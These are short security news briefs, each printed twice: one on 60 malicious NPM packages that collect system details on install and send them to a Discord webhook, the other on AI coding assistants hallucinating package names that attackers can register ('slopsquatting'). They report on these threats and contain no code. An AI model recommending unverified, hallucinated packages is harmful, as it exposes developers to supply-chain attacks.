Security firm Socket discovered an active campaign targeting developers through 60 malicious NPM packages that steal system data when installed. Over two weeks, threat actors published packages containing scripts that collect hostnames, IP addresses, DNS servers, and directory paths, sending everything to a Discord webhook.
The packages have been downloaded over 3,000 times across Windows, Linux, and macOS systems. Three NPM accounts published 20 packages each, all containing identical fingerprinting code designed to evade detection.
Socket warns this data helps attackers map internal developer networks to public infrastructure, enabling future supply chain attacks and targeted intrusions.
Source: Security Week
Security firm Socket discovered an active campaign targeting developers through 60 malicious NPM packages that steal system data when installed. Over two weeks, threat actors published packages containing scripts that collect hostnames, IP addresses, DNS servers, and directory paths, sending everything to a Discord webhook.
The packages have been downloaded over 3,000 times across Windows, Linux, and macOS systems. Three NPM accounts published 20 packages each, all containing identical fingerprinting code designed to evade detection.
Socket warns this data helps attackers map internal developer networks to public infrastructure, enabling future supply chain attacks and targeted intrusions.
Source: Security Week
Researchers from three US universities discovered that AI coding assistants frequently recommend fake software packages that don't exist - a problem they've dubbed "slopsquatting." Hackers can exploit this by creating malicious packages with these hallucinated names, tricking developers into downloading compromised code.
The study tested 16 popular AI models and found none were immune. Commercial models hallucinated packages 5.2% of the time, while open-source models hit 21.7%. Out of 2.23 million generated packages, nearly 20% were fake.
This creates a dangerous supply chain attack where malicious code could infect entire software projects. The researchers suggest better prompt engineering and model training to address the issue.
Source: Security Week
Researchers from three US universities discovered that AI coding assistants frequently recommend fake software packages that don't exist - a problem they've dubbed "slopsquatting." Hackers can exploit this by creating malicious packages with these hallucinated names, tricking developers into downloading compromised code.
The study tested 16 popular AI models and found none were immune. Commercial models hallucinated packages 5.2% of the time, while open-source models hit 21.7%. Out of 2.23 million generated packages, nearly 20% were fake.
This creates a dangerous supply chain attack where malicious code could infect entire software projects. The researchers suggest better prompt engineering and model training to address the issue.
Source: Security Week